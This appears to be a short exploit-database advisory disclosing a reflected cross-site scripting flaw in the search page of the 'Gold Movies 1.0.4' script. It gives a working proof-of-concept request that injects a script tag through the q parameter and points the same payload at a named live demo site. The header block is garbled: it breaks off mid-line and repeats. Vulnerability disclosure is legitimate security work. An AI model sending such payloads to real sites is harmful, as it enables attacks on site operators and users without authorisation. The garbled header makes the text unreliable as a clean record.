# Exploit Title: Gold Movies 1.0.4 - Cross-site Script
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# A # Exploit Title: Gold Movies 1.0.4 - Cross-site Script
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://codecanyon.net/user/themesgold
# Software Link: https://codecanyon.net/item/gold-movies/11371340
# Demo Website: http://themes-gold.com/movies/
# Version: 1.0.4
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
A XSS found in "Gold Movies 1.0.4" search section.

# POC Request:
http://[PATH]/search?q="><script>alert('Deyaa')</script>

#Live Target:
http://themes-gold.com/movies/search?q="><script>alert('Deyaa')</script>